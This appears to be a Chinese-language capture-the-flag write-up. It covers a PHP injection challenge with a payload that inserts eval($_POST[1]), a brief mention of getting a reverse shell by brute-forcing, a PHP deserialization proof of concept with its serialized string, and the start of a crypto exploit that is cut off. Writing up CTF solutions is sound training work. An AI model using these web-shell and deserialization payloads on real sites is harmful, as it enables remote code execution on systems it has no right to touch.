WEBwhat's my name构造payload:d0g3=12345include'"]);}eval($_POST[1]);/*&name=%00lambda_36使用bp连续爆破使其反弹shell拿到shell查看环境变量发现flageasy_unserialize构造POC:phperror_reporting(0);class Luck{public $l1;public $md5;}class You{public $y1;}$a = new You();$a -> y1 = new Luck();$a -> y1 -> md5 = new Luck();$a -> y1 -> md5 -> l1 = "phpinfo";echo serialize($a);?>//O:3:"You":1:{s:2:"y1";O:4:"Luck":2:{s:2:"l1";N;s:3:"md5";O:4:"Luck":2:{s:2:"l1";s:7:"phpinfo";s:3:"md5";N;}}}Crypto010101本题关键在p1[random.choice([i for i, c in enumerate(p1) if c == '1'])] = '0'p2[random.choice([i for i, c in enumerate(p1) if c == '0'])] = '1'意思就是p1中有一个1被改为了0对于p2来说,是有可能不改变的,因为索引值是p_1的直接爆破即可,遍历p1中的0,把0改为1即可,需要注意的是p2要分两种情况,一种是不变的时候,一种是变的情况exp:from Crypto.Util.number import *import gmpy2from tqdm import *n =60392904126
………………………………